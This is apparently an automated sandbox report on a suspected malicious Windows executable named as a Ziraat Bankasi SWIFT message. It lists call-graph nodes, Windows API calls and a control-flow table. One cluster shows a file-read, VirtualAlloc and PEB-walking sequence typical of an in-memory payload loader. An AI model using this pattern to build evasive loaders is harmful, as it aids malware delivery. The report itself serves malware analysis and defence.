calls 55188->55201 55193->55157 55196 f1e4c 55205 84ffc 55196->55205 55198->55183 55199->55194 55200->55187 55201->55194 55202->55169 55203->55184 55204->55196 55206 85027 _memset 55205->55206 55218 84c30 55206->55218 55210 850ca Shell_NotifyIconW 55222 851af 55210->55222 55211 f3d28 Shell_NotifyIconW 55212 850ac 55212->55210 55212->55211 55214 850df 55214->55193 55215->55187 55216->55193 55217->55186 55219 f3c33 55218->55219 55220 84c44 55218->55220 55219->55220 55221 f3c3c DestroyIcon 55219->55221 55220->55212 55244 c5819 61 API calls _W_store_winword 55220->55244 55221->55220 55223 851cb 55222->55223 55243 852a2 55222->55243 55224 86b0f 48 API calls 55223->55224 55225 851d9 55224->55225 55226 f3ca1 LoadStringW 55225->55226 55227 851e6 55225->55227 55230 f3cbb 55226->55230 55228 86a63 48 API calls 55227->55228 55229 851fb 55228->55229 55229->55230 55231 8520c 55229->55231 55232 8510d 48 API calls 55230->55232 55233 85216 55231->55233 55234 852a7 55231->55234 55237 f3cc5 55232->55237 55245 8510d 55233->55245 55254 86eed 48 API calls 55234->55254 55240 85220 _memset _wcscpy 55237->55240 55255 8518c 55237->55255 55239 f3ce7 55242 8518c 48 API calls 55239->55242 55241 85288 Shell_NotifyIconW 55240->55241 55241->55243 55242->55240 55243->55214 55244->55212 55246 8511f 55245->55246 55247 f1be7 55245->55247 55265 8b384 55246->55265 55274 ba58f 48 API calls ___crtGetEnvironmentStringsW 55247->55274 55250 8512b 55250->55240 55251 f1bf1 55275 86eed 48 API calls 55251->55275 55253 f1bf9 55254->55240 55256 85197 55255->55256 55257 f1ace 55256->55257 55258 8519f 55256->55258 55260 86b4a 48 API calls 55257->55260 55276 85130 55258->55276 55262 f1adb __NMSG_WRITE 55260->55262 55261 851aa 55261->55239 55263 9ee75 48 API calls 55262->55263 55264 f1b07 ___crtGetEnvironmentStringsW 55263->55264 55266 8b392 55265->55266 55271 8b3c5 ___crtGetEnvironmentStringsW 55265->55271 55267 8b3b8 55266->55267 55268 8b3fd 55266->55268 55266->55271 55269 8bb85 48 API calls 55267->55269 55270 9f4ea 48 API calls 55268->55270 55269->55271 55272 8b407 55270->55272 55271->55250 55273 9f4ea 48 API calls 55272->55273 55273->55271 55274->55251 55275->55253 55277 8513f __NMSG_WRITE 55276->55277 55278 f1b27 55277->55278 55279 85151 55277->55279 55280 86b4a 48 API calls 55278->55280 55281 8bb85 48 API calls 55279->55281 55282 f1b34 55280->55282 55283 8515e ___crtGetEnvironmentStringsW 55281->55283 55284 9ee75 48 API calls 55282->55284 55283->55261 55285 f1b57 ___crtGetEnvironmentStringsW 55284->55285 55286 83aa3 SystemParametersInfoW 55287 83ac8 55286->55287 55288 8ecc5 55289 8ec8a 55288->55289 55309 8e920 Mailbox 55289->55309 55319 ccc5c 86 API calls 3 library calls 55289->55319 55291 8e94c PeekMessageW 55291->55309 55292 8ebc7 55294 8ed21 PeekMessageW 55294->55309 55297 8edae timeGetTime 55316 81caa 49 API calls 55297->55316 55299 8ebf7 timeGetTime 55299->55309 55300 8ed3a TranslateMessage DispatchMessageW 55300->55294 55301 9f4ea 48 API calls 55301->55309 55302 f5420 55304 f5429 55302->55304 55305 f5445 Sleep 55302->55305 55304->55305 55306 f5432 Sleep 55304->55306 55305->55292 55306->55305 55309->55291 55309->55292 55309->55294 55309->55297 55309->55299 55309->55300 55309->55301 55309->55302 55310 8ce19 48 API calls 55309->55310 55311 8d6e9 55 API calls 55309->55311 55312 8eed0 94 API calls Mailbox 55309->55312 55313 8ef00 88 API calls 55309->55313 55314 9e244 TranslateAcceleratorW 55309->55314 55315 9dc5f IsDialogMessageW GetClassLongW 55309->55315 55317 e8d23 48 API calls 55309->55317 55318 81caa 49 API calls 55309->55318 55310->55309 55311->55309 55312->55309 55313->55309 55314->55309 55315->55309 55316->55309 55317->55309 55318->55309 55319->55309 55320 84166 55321 841a9 136 API calls 55320->55321 55322 84172 55321->55322 55323 8417a 55322->55323 55324 f3489 55322->55324 55325 f34aa 55323->55325 55326 84186 55323->55326 55334 cc396 55324->55334 55370 c6b49 87 API calls _wprintf 55325->55370 55369 8c833 162 API calls 6 library calls 55326->55369 55331 f34b8 55332 8419e 55333 84252 84 API calls 55333->55325 55335 84517 83 API calls 55334->55335 55336 cc405 55335->55336 55337 cc56d 94 API calls 55336->55337 55338 cc417 55337->55338 55339 844ed 64 API calls 55338->55339 55368 cc41b 55338->55368 55340 cc432 55339->55340 55341 844ed 64 API calls 55340->55341 55342 cc442 55341->55342 55343 844ed 64 API calls 55342->55343 55344 cc45d 55343->55344 55345 844ed 64 API calls 55344->55345 55346 cc478 55345->55346 55347 84517 83 API calls 55346->55347 55348 cc48f 55347->55348 55349 a395c __crtGetStringTypeA_stat 47 API calls 55348->55349 55350 cc496 55349->55350 55351 a395c __crtGetStringTypeA_stat 47 API calls 55350->55351 55352 cc4a0 55351->55352 55353 844ed 64 API calls 55352->55353 55354 cc4b4 55353->55354 55355 cbf5a GetSystemTimeAsFileTime 55354->55355 55356 cc4c7 55355->55356 55357 cc4dc 55356->55357 55358 cc4f1 55356->55358 55361 a1c9d _free 47 API calls 55357->55361 55359 cc556 55358->55359 55360 cc4f7 55358->55360 55363 a1c9d _free 47 API calls 55359->55363 55371 cb965 118 API calls __fcloseall 55360->55371 55364 cc4e2 55361->55364 55363->55368 55366 a1c9d _free 47 API calls 55364->55366 55365 cc54e 55367 a1c9d _free 47 API calls 55365->55367 55366->55368 55367->55368 55368->55333 55369->55332 55370->55331 55371->55365 55372 840a7 55377 af8a0 55372->55377 55375 86a63 48 API calls 55376 840dc 55375->55376 55378 840b4 GetLongPathNameW 55377->55378 55378->55375 55379 83d98 55380 83da0 GetFullPathNameW 55379->55380 55381 83e3a 55379->55381 55383 86a63 48 API calls 55380->55383 55382 83e41 SetCurrentDirectoryW 55381->55382 55386 83e4e 55382->55386 55384 83ddb 55383->55384 55417 86430 55384->55417 55388 f1cf8 55391 f1cff SetCurrentDirectoryW 55388->55391 55389 83df6 55390 83e00 55389->55390 55442 c71fa AllocateAndInitializeSid CheckTokenMembership FreeSid 55389->55442 55433 83e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 55390->55433 55391->55386 55395 f1d1c 55395->55390 55398 f1d2d 55395->55398 55397 83e0a 55400 84ffc 67 API calls 55397->55400 55403 83e1f 55397->55403 55443 85374 55398->55443 55400->55403 55401 f1d35 55402 8ce19 48 API calls 55401->55402 55404 f1d42 55402->55404 55403->55381 55441 83847 Shell_NotifyIconW _memset 55403->55441 55406 f1d6e 55404->55406 55407 f1d49 55404->55407 55408 8518c 48 API calls 55406->55408 55409 8518c 48 API calls 55407->55409 55410 f1d6a GetForegroundWindow ShellExecuteW 55408->55410 55411 f1d54 55409->55411 55415 f1d9e 55410->55415 55412 8510d 48 API calls 55411->55412 55414 f1d61 55412->55414 55416 8518c 48 API calls 55414->55416 55415->55381 55416->55410 55418 8643d __ftell_nolock 55417->55418 55450 84c75 55418->55450 55420 86442 55421 83dee 55420->55421 55461 85928 86 API calls 55420->55461 55421->55388 55421->55389 55423 8644f 55423->55421 55462 85798 88 API calls 55423->55462 55425 86458 55425->55421 55426 8645c GetFullPathNameW 55425->55426 55427 86a63 48 API calls 55426->55427 55428 86488 55427->55428 55429 86a63 48 API calls 55428->55429 55430 86495 55429->55430 55431 f5dcf _wcscat 55430->55431 55432 86a63 48 API calls 55430->55432 55432->55421 55434 83ed8 55433->55434 55435 f1cba 55433->55435 55466 84024 55434->55466 55439 83e05 55440 836b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 55439->55440 55440->55397 55441->55381 55442->55395 55444 af8a0 __ftell_nolock 55443->55444 55445 85381 GetModuleFileNameW 55444->55445 55446 8ce19 48 API calls 55445->55446 55447 853a7 55446->55447 55471 8660f 55447->55471 55449 853b1 55449->55401 55451 84c8b 55450->55451 55456 84d94 55450->55456 55452 9f4ea 48 API calls 55451->55452 55451->55456 55453 84cb2 55452->55453 55454 9f4ea 48 API calls 55453->55454 55460 84d22 55454->55460 55455 8b470 91 API calls 55455->55460 55456->55420 55460->55455 55460->55456 55463 84dd9 48 API calls 55460->55463 55464 c9af1 48 API calls 55460->55464 55465 8ba85 48 API calls ___crtGetEnvironmentStringsW 55460->55465 55461->55423 55462->55425 55463->55460 55464->55460 55465->55460 55467 f418d EnumResourceNamesW 55466->55467 55468 8403c LoadImageW 55466->55468 55469 83ee1 RegisterClassExW 55467->55469 55468->55469 55470 83f53 7 API calls 55469->55470 55470->55439 55472 af8a0 __ftell_nolock 55471->55472 55473 8661c GetFullPathNameW 55472->55473 55474 86a63 48 API calls 55473->55474 55475 86643 55474->55475 55478 86571 55475->55478 55479 8657f 55478->55479 55480 8b18b 48 API calls 55479->55480 55481 8658f 55480->55481 55481->55449 55482 9c75a 55483 8d7f7 48 API calls 55482->55483 55484 9c7c8 55483->55484 55489 9d26c 55484->55489 55487 9c865 55488 9c881 55487->55488 55492 9d1fa 48 API calls ___crtGetEnvironmentStringsW 55487->55492 55493 9d298 55489->55493 55492->55487 55494 9d28b 55493->55494 55495 9d2a5 55493->55495 55494->55487 55495->55494 55496 9d2ac RegOpenKeyExW 55495->55496 55496->55494 55497 9d2c6 RegQueryValueExW 55496->55497 55498 9d2fc RegCloseKey 55497->55498 55499 9d2e7 55497->55499 55498->55494 55499->55498 55500 9335a 55503 9338a 55500->55503 55501 f9528 55502 f94df 55502->55501 55551 ccc5c 86 API calls 3 library calls 55502->55551 55503->55502 55522 9346c ___crtGetEnvironmentStringsW 55503->55522 55533 82b7a 55503->55533 55506 933ce 55507 f945e 55506->55507 55508 93465 55506->55508 55506->55522 55548 cc942 50 API calls 55507->55548 55510 9f4ea 48 API calls 55508->55510 55510->55522 55512 f9438 55547 ccc5c 86 API calls 3 library calls 55512->55547 55514 f93c5 55519 93628 Mailbox 55514->55519 55546 8d6e9 55 API calls 55514->55546 55516 9351f 55523 93540 55516->55523 55549 86eed 48 API calls 55516->55549 55522->55512 55522->55514 55522->55516 55522->55519 55526 9f4ea 48 API calls 55522->55526 55530 f9394 55522->55530 55541 8d9a0 53 API calls __cinit 55522->55541 55542 8d8c0 53 API calls 55522->55542 55543 c80e3 53 API calls 55522->55543 55544 8d764 55 API calls 55522->55544 55545 8dcae 50 API calls Mailbox 55522->55545 55523->55519 55524 f94b0 55523->55524 55527 93585 55523->55527 55550 8dcae 50 API calls Mailbox 55524->55550 55526->55522 55527->55502 55527->55519 55528 93615 55527->55528 55540 8dcae 50 API calls Mailbox 55528->55540 55532 9f4ea 48 API calls 55530->55532 55532->55514 55534 82b8b 55533->55534 55535 f436a 55533->55535 55536 9f4ea 48 API calls 55534->55536 55537 82b92 55536->55537 55538 82bb3 55537->55538 55552 82bce 48 API calls 55537->55552 55538->55506 55540->55519 55541->55522 55542->55522 55543->55522 55544->55522 55545->55522 55546->55512 55547->55519 55548->55516 55549->55523 55550->55502 55551->55501 55552->55538 55553 839db 55554 841a9 136 API calls 55553->55554 55555 839fe 55554->55555 55556 83a06 55555->55556 55557 cc396 122 API calls 55555->55557 55558 f2fe4 55557->55558 55559 f2ff0 55558->55559 55561 84252 84 API calls 55558->55561 55560 a1c9d _free 47 API calls 55559->55560 55562 f2ffd 55560->55562 55561->55559 55563 84252 84 API calls 55562->55563 55564 f3006 55563->55564 55564->55564 55565 e41e10 55579 e3fa40 55565->55579 55567 e41ecd 55582 e41d00 55567->55582 55569 e41ef6 CreateFileW 55571 e41f4a 55569->55571 55578 e41f45 55569->55578 55572 e41f61 VirtualAlloc 55571->55572 55571->55578 55573 e41f82 ReadFile 55572->55573 55572->55578 55574 e41f9d 55573->55574 55573->55578 55575 e40ab0 12 API calls 55574->55575 55576 e41fb7 55575->55576 55577 e40d00 GetPEB GetPEB 55576->55577 55577->55578 55585 e42f10 GetPEB 55579->55585 55581 e400cb 55581->55567 55583 e41d09 Sleep 55582->55583 55584 e41d17 55583->55584 55586 e42f3a 55585->55586 55586->55581 55587 a5dfd 55588 a5e09 __setmbcp 55587->55588 55622 a7eeb GetStartupInfoW 55588->55622 55591 a5e66 55593 a5e71 55591->55593 55696 a5f4d 47 API calls 3 library calls 55591->55696 55592 a5e0e 55624 a9ca7 GetProcessHeap 55592->55624 55625 a7b47 55593->55625 55596 a5e77 55597 a5e82 __RTC_Initialize 55596->55597 55697 a5f4d 47 API calls 3 library calls 55596->55697 55646 aacb3 55597->55646 55600 a5e91 55601 a5e9d GetCommandLineW 55600->55601 55698 a5f4d 47 API calls 3 library calls 55600->55698 55665 b2e7d GetEnvironmentStringsW 55601->55665 55604 a5e9c 55604->55601 55608 a5ec2 55678 b2cb4 55608->55678 55612 a5ed3 55692 a1195 55612->55692 55615 a5edb 55617 a5ee6 __wwincmdln 55615->55617 55701 a115b 47 API calls 3 library calls 55615->55701 55618 a5f09 55617->55618 55702 a13f1 47 API calls _doexit 55617->55702 55703 a1186 47 API calls _doexit 55618->55703 55621 a5f0e __setmbcp 55623 a7f01 55622->55623 55623->55592 55624->55591 55704 a123a 30 API calls 2 library calls 55625->55704 55627 a7b4c 55705 a7e23 InitializeCriticalSectionAndSpinCount 55627->55705 55629 a7b51 55630 a7b55 55629->55630 55707 a7e6d TlsAlloc 55629->55707 55706 a7bbd 50 API calls 2 library calls 55630->55706 55633 a7b5a 55633->55596 55634 a7b67 55634->55630 55635 a7b72 55634->55635 55708 a6986 55635->55708 55638 a7bb4 55716 a7bbd 50 API calls 2 library calls 55638->55716 55641 a7b93 55641->55638 55643 a7b99 55641->55643 55642 a7bb9 55642->55596 55715 a7a94 47 API calls 4 library calls 55643->55715 55645 a7ba1 GetCurrentThreadId 55645->55596 55647 aacbf __setmbcp 55646->55647 55648 a7cf4 __lock 47 API calls 55647->55648 55649 aacc6 55648->55649 55650 a6986 __calloc_crt 47 API calls 55649->55650 55652 aacd7 55650->55652 55651 aad42 GetStartupInfoW 55653 aad57 55651->55653 55660 aae80 55651->55660 55652->55651 55655 aace2 @_EH4_CallFilterFunc@8 __setmbcp 55652->55655 55658 a6986 __calloc_crt 47 API calls 55653->55658 55653->55660 55661 aada5 55653->55661 55654 aaf44 55725 aaf58 LeaveCriticalSection _doexit 55654->55725 55655->55600 55657 aaec9 GetStdHandle 55657->55660 55658->55653 55659 aaedb GetFileType 55659->55660 55660->55654 55660->55657 55660->55659 55662 aaf08 InitializeCriticalSectionAndSpinCount 55660->55662 55661->55660 55663 aadd7 GetFileType 55661->55663 55664 aade5 InitializeCriticalSectionAndSpinCount 55661->55664 55662->55660 55663->55661 55663->55664 55664->55661 55666 b2e8e 55665->55666 55667 a5ead 55665->55667 55726 a69d0 47 API calls __crtGetStringTypeA_stat 55666->55726 55672 b2a7b GetModuleFileNameW 55667->55672 55670 b2eb4 ___crtGetEnvironmentStringsW 55671 b2eca FreeEnvironmentStringsW 55670->55671 55671->55667 55673 b2aaf _wparse_cmdline 55672->55673 55674 a5eb7 55673->55674 55675 b2ae9 55673->55675 55674->55608 55699 a115b 47 API calls 3 library calls 55674->55699 55727 a69d0 47 API calls __crtGetStringTypeA_stat 55675->55727 55677 b2aef _wparse_cmdline 55677->55674 55679 b2ccd __NMSG_WRITE 55678->55679 55683 a5ec8 55678->55683 55680 a6986 __calloc_crt 47 API calls 55679->55680 55688 b2cf6 __NMSG_WRITE 55680->55688 55681 b2d4d 55682 a1c9d _free 47 API calls 55681->55682 55682->55683 55683->55612 55700 a115b 47 API calls 3 library calls 55683->55700 55684 a6986 __calloc_crt 47 API calls 55684->55688 55685 b2d72 55686 a1c9d _free 47 API calls 55685->55686 55686->55683 55688->55681 55688->55683 55688->55684 55688->55685 55689 b2d89 55688->55689 55728 b2567 47 API calls __wtof_l 55688->55728 55690 a6e20 __invoke_watson 8 API calls 55689->55690 55691 b2d95 55690->55691 55693 a11a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 55692->55693 55695 a11e0 __IsNonwritableInCurrentImage 55693->55695 55729 a0f0a 52 API calls __cinit 55693->55729 55695->55615 55696->55593 55697->55597 55698->55604 55702->55618 55703->55621 55704->55627 55705->55629 55706->55633 55707->55634 55711 a698d 55708->55711 55710 a69ca 55710->55638 55714 a7ec9 TlsSetValue 55710->55714 55711->55710 55712 a69ab Sleep 55711->55712 55717 b30aa 55711->55717 55713 a69c2 55712->55713 55713->55710 55713->55711 55714->55641 55715->55645 55716->55642 55718 b30d0 __calloc_impl 55717->55718 55719 b30b5 55717->55719 55722 b30e0 HeapAlloc 55718->55722 55723 b30c6 55718->55723 55719->55718 55720 b30c1 55719->55720 55724 a7c0e 47 API calls __getptd_noexit 55720->55724 55722->55718 55722->55723 55723->55711 55724->55723 55725->55655 55726->55670 55727->55677 55728->55688 55729->55695 55730 84a30 55731 84a40 __ftell_nolock 55730->55731 55732 8d7f7 48 API calls 55731->55732 55733 84af6 55732->55733 55734 85374 50 API calls 55733->55734 55735 84aff 55734->55735 55750 8363c 55735->55750 55738 8518c 48 API calls 55739 84b18 55738->55739 55756 864cf 55739->55756 55742 8d7f7 48 API calls 55743 84b32 55742->55743 55762 849fb 55743->55762 55745 84b43 55746 84b3d _wcscat __NMSG_WRITE 55746->55745 55747 861a6 48 API calls 55746->55747 55748 8ce19 48 API calls 55746->55748 55749 864cf 48 API calls 55746->55749 55747->55746 55748->55746 55749->55746 55751 83649 __ftell_nolock 55750->55751 55776 8366c GetFullPathNameW 55751->55776 55753 8365a 55754 86a63 48 API calls 55753->55754 55755 83669 55754->55755 55755->55738 55757 8651b 55756->55757 55761 864dd ___crtGetEnvironmentStringsW 55756->55761 55759 9f4ea 48 API calls 55757->55759 55758 9f4ea 48 API calls 55760 84b29 55758->55760 55759->55761 55760->55742 55761->55758 55778 8bcce 55762->55778 55765 f41cc RegQueryValueExW 55767 f4246 RegCloseKey 55765->55767 55768 f41e5 55765->55768 55766 84a2b 55766->55746 55769 9f4ea 48 API calls 55768->55769 55770 f41fe 55769->55770 55771 847b7 48 API calls 55770->55771 55772 f4208 RegQueryValueExW 55771->55772 55773 f4224 55772->55773 55775 f423b 55772->55775 55774 86a63 48 API calls 55773->55774 55774->55775 55775->55767 55777 8368a 55776->55777 55777->55753 55779 8bce8 55778->55779 55780 84a0a RegOpenKeyExW 55778->55780 55781 9f4ea 48 API calls 55779->55781 55780->55765 55780->55766 55782 8bcf2 55781->55782 55783 9ee75 48 API calls 55782->55783 55783->55780 55784 ca635 55785 ca642 55784->55785 55794 ca66f 55784->55794 55786 ca671 55785->55786 55788 ca676 55785->55788 55792 ca669 55785->55792 55785->55794 55796 9ec4e 81 API calls 55786->55796 55789 8936c 81 API calls 55788->55789 55790 ca67d 55789->55790 55791 8510d 48 API calls 55790->55791 55791->55794 55795 94525 49 API calls ___crtGetEnvironmentStringsW 55792->55795 55795->55794 55796->55788 55797 8ec51 55820 8f110 55797->55820 55799 8ebc7 55800 8e94c PeekMessageW 55802 8e920 55800->55802 55802->55799 55802->55800 55803 8ed21 PeekMessageW 55802->55803 55806 8edae timeGetTime 55802->55806 55808 8ebf7 timeGetTime 55802->55808 55809 8ed3a TranslateMessage DispatchMessageW 55802->55809 55810 9f4ea 48 API calls 55802->55810 55811 f5420 55802->55811 55818 8ce19 48 API calls 55802->55818 55819 8d6e9 55 API calls 55802->55819 55870 8eed0 94 API calls Mailbox 55802->55870 55871 8ef00 88 API calls 55802->55871 55872 9e244 TranslateAcceleratorW 55802->55872 55873 9dc5f IsDialogMessageW GetClassLongW 55802->55873 55875 e8d23 48 API calls 55802->55875 55876 81caa 49 API calls 55802->55876 55803->55802 55874 81caa 49 API calls 55806->55874 55808->55802 55809->55803 55810->55802 55813 f5429 55811->55813 55814 f5445 Sleep 55811->55814 55813->55814 55815 f5432 Sleep 55813->55815 55814->55799 55815->55814 55818->55802 55819->55802 55823 8f130 55820->55823 55821 8f3dd 55824 f87c8 55821->55824 55834 8f3f2 55821->55834 55859 8f431 Mailbox 55821->55859 55822 8f595 55827 8d7f7 48 API calls 55822->55827 55822->55859 55826 8f199 55823->55826 55879 ccc5c 86 API calls 3 library calls 55823->55879 55882 ccc5c 86 API calls 3 library calls 55824->55882 55826->55821 55826->55822 55830 8d7f7 48 API calls 55826->55830 55856 8f229 55826->55856 55829 f87a3 55827->55829 55881 a0f0a 52 API calls __cinit 55829->55881 55833 f8772 55830->55833 55832 f8b1b 55844 f8bcf 55832->55844 55832->55859 55880 a0f0a 52 API calls __cinit 55833->55880 55849 8f418 55834->55849 55883 c9af1 48 API calls 55834->55883 55838 f8c53 55895 ccc5c 86 API calls 3 library calls 55838->55895 55839 f8810 55884 deef8 218 API calls 55839->55884 55840 ccc5c 86 API calls 55840->55859 55892 ccc5c 86 API calls 3 library calls 55844->55892 55845 f8beb 55893 dbdbd 122 API calls Mailbox 55845->55893 55849->55832 55851 8f6aa 55849->55851 55849->55859 55850 f8c00 55868 8f537 Mailbox 55850->55868 55894 ccc5c 86 API calls 3 library calls 55850->55894 55853 8fce0 55851->55853 55851->55859 55851->55868 55889 9c1af 48 API calls 55851->55889 55852 f8823 55852->55849 55855 f884b 55852->55855 55853->55868 55891 ccc5c 86 API calls 3 library calls 55853->55891 55885 dccdc 48 API calls 55855->55885 55856->55821 55856->55822 55856->55849 55856->55859 55859->55838 55859->55840 55859->55845 55859->55853 55859->55868 55877 8dd47 48 API calls ___crtGetEnvironmentStringsW 55859->55877 55878 8d6e9 55 API calls 55859->55878 55890 b97ed InterlockedDecrement 55859->55890 55896 9c1af 48 API calls 55859->55896 55861 f8857 55863 f8865 55861->55863 55864 f88aa 55861->55864 55886 c9b72 48 API calls 55863->55886 55864->55868 55887 ca69d 48 API calls 55864->55887 55867 f88e7 55888 8bc74 48 API calls 55867->55888 55868->55802 55870->55802 55871->55802 55872->55802 55873->55802 55874->55802 55875->55802 55876->55802 55877->55859 55878->55859 55879->55826 55880->55856 55881->55859 55882->55868 55883->55839 55884->55852 55885->55861 55886->55868 55887->55867 55888->55868 55889->55859 55890->55859 55891->55868 55892->55868 55893->55850 55894->55868 55895->55868 55896->55859 55897 90ad5 55902 90ae0 Mailbox ___crtGetEnvironmentStringsW 55897->55902 55898 9f4ea 48 API calls 55898->55902 55899 fa706 55903 ccc5c 86 API calls 3 library calls 55899->55903 55901 fa71f Mailbox 55902->55898 55902->55899 55902->55901 55903->55901 55904 9ed15 55905 9ed2d 55904->55905 55906 9edc5 VirtualProtect 55905->55906 55907 9ed93 55905->55907 55906->55907 55908 9dd94 55909 9f4ea 48 API calls 55908->55909 55911 9dd9c 55909->55911 55910 9ddb0 55911->55910 55915 9df3d 55911->55915 55916 9dda8 55915->55916 55917 9df46 55915->55917 55919 9ddc0 55916->55919 55947 a0f0a 52 API calls __cinit 55917->55947 55920 8d7f7 48 API calls 55919->55920 55921 9ddd7 GetVersionExW 55920->55921 55922 86a63 48 API calls 55921->55922 55923 9de1a 55922->55923 55948 9dfb4 55923->55948 55926 86571 48 API calls 55935 9de2e 55926->55935 55928 f24c8 55930 9dea4 GetCurrentProcess 55961 9df5f LoadLibraryA GetProcAddress 55930->55961 55931 9debb 55933 9df31 GetSystemInfo 55931->55933 55934 9dee3 55931->55934 55936 9df0e 55933->55936 55955 9e00c 55934->55955 55935->55928 55952 9df77 55935->55952 55939 9df1c FreeLibrary 55936->55939 55940 9df21 55936->55940 55939->55940 55940->55910 55941 9df29 GetSystemInfo 55943 9df03 55941->55943 55942 9def9 55958 9dff4 55942->55958 55943->55936 55946 9df09 FreeLibrary 55943->55946 55946->55936 55947->55916 55949 9dfbd 55948->55949 55950 8b18b 48 API calls 55949->55950 55951 9de22 55950->55951 55951->55926 55962 9df89 55952->55962 55966 9e01e 55955->55966 55959 9e00c 2 API calls 55958->55959 55960 9df01 GetNativeSystemInfo 55959->55960 55960->55943 55961->55931 55963 9dea0 55962->55963 55964 9df92 LoadLibraryA 55962->55964 55963->55930 55963->55931 55964->55963 55965 9dfa3 GetProcAddress 55964->55965 55965->55963 55967 9def1 55966->55967 55968 9e027 LoadLibraryA 55966->55968 55967->55941 55967->55942 55968->55967 55969 9e038 GetProcAddress 55968->55969 55969->55967

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        • Executed
                                                                                                                                                        • Not Executed
                                                                                                                                                        control_flow_graph 322 ab043-ab080 call af8a0 325 ab089-ab08b 322->325 326 ab082-ab084 322->326 328 ab0ac-ab0d9 325->328 329 ab08d-ab0a7 call a7bda call a7c0e call a6e10 325->329 327 ab860-ab86c call aa70c 326->327 330 ab0db-ab0de 328->330 331 ab0e0-ab0e7 328->331 329->327 330->331 334 ab10b-ab110 330->334 335 ab0e9-ab100 call a7bda call a7c0e call a6e10 331->335 336 ab105 331->336 339 ab11f-ab12d call b3bf2 334->339 340 ab112-ab11c call af82f 334->340 371 ab851-ab854 335->371 336->334 352 ab44b-ab45d 339->352 353 ab133-ab145 339->353 340->339 356 ab7b8-ab7d5 WriteFile 352->356 357 ab463-ab473 352->357 353->352 355 ab14b-ab183 call a7a0d GetConsoleMode 353->355 355->352 378 ab189-ab18f 355->378 359 ab7e1-ab7e7 GetLastError 356->359 360 ab7d7-ab7df 356->360 362 ab55a-ab55f 357->362 363 ab479-ab484 357->363 365 ab7e9 359->365 360->365 366 ab663-ab66e 362->366 367 ab565-ab56e 362->367 369 ab48a-ab49a 363->369 370 ab81b-ab833 363->370 375 ab7ef-ab7f1 365->375 366->370 374 ab674 366->374 367->370 376 ab574 367->376 379 ab4a0-ab4a3 369->379 372 ab83e-ab84e call a7c0e call a7bda 370->372 373 ab835-ab838 370->373 377 ab85e-ab85f 371->377 372->371 373->372 380 ab83a-ab83c 373->380 381 ab67e-ab693 374->381 383 ab7f3-ab7f5 375->383 384 ab856-ab85c 375->384 385 ab57e-ab595 376->385 377->327 386 ab199-ab1bc GetConsoleCP 378->386 387 ab191-ab193 378->387 388 ab4e9-ab520 WriteFile 379->388 389 ab4a5-ab4be 379->389 380->377 391 ab699-ab69b 381->391 383->370 393 ab7f7-ab7fc 383->393 384->377 394 ab59b-ab59e 385->394 395 ab1c2-ab1ca 386->395 396 ab440-ab446 386->396 387->352 387->386 388->359 390 ab526-ab538 388->390 397 ab4cb-ab4e7 389->397 398 ab4c0-ab4ca 389->398 390->375 399 ab53e-ab54f 390->399 400 ab6d8-ab719 WideCharToMultiByte 391->400 401 ab69d-ab6b3 391->401 403 ab7fe-ab810 call a7c0e call a7bda 393->403 404 ab812-ab819 call a7bed 393->404 405 ab5de-ab627 WriteFile 394->405 406 ab5a0-ab5b6 394->406 407 ab1d4-ab1d6 395->407 396->383 397->379 397->388 398->397 399->369 408 ab555 399->408 400->359 412 ab71f-ab721 400->412 409 ab6c7-ab6d6 401->409 410 ab6b5-ab6c4 401->410 403->371 404->371 405->359 417 ab62d-ab645 405->417 414 ab5b8-ab5ca 406->414 415 ab5cd-ab5dc 406->415 418 ab36b-ab36e 407->418 419 ab1dc-ab1fe 407->419 408->375 409->391 409->400 410->409 424 ab727-ab75a WriteFile 412->424 414->415 415->394 415->405 417->375 427 ab64b-ab658 417->427 422 ab370-ab373 418->422 423 ab375-ab3a2 418->423 420 ab200-ab215 419->420 421 ab217-ab223 call a1688 419->421 428 ab271-ab283 call b40f7 420->428 442 ab269-ab26b 421->442 443 ab225-ab239 421->443 422->423 430 ab3a8-ab3ab 422->430 423->430 431 ab77a-ab78e GetLastError 424->431 432 ab75c-ab776 424->432 427->385 434 ab65e 427->434 452 ab289 428->452 453 ab435-ab43b 428->453 436 ab3ad-ab3b0 430->436 437 ab3b2-ab3c5 call b5884 430->437 441 ab794-ab796 431->441 432->424 439 ab778 432->439 434->375 436->437 444 ab407-ab40a 436->444 437->359 456 ab3cb-ab3d5 437->456 439->441 441->365 447 ab798-ab7b0 441->447 442->428 449 ab23f-ab254 call b40f7 443->449 450 ab412-ab42d 443->450 444->407 448 ab410 444->448 447->381 454 ab7b6 447->454 448->453 449->453 463 ab25a-ab267 449->463 450->453 457 ab28f-ab2c4 WideCharToMultiByte 452->457 453->365 454->375 459 ab3fb-ab401 456->459 460 ab3d7-ab3ee call b5884 456->460 457->453 461 ab2ca-ab2f0 WriteFile 457->461 459->444 460->359 467 ab3f4-ab3f5 460->467 461->359 462 ab2f6-ab30e 461->462 462->453 466 ab314-ab31b 462->466 463->457 466->459 468 ab321-ab34c WriteFile 466->468 467->459 468->359 469 ab352-ab359 468->469 469->453 470 ab35f-ab366 469->470 470->459
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 14b37e99e6b67c2d3a7853a518fd08583b6d7efd2b54fe0d79ab11d15510882d
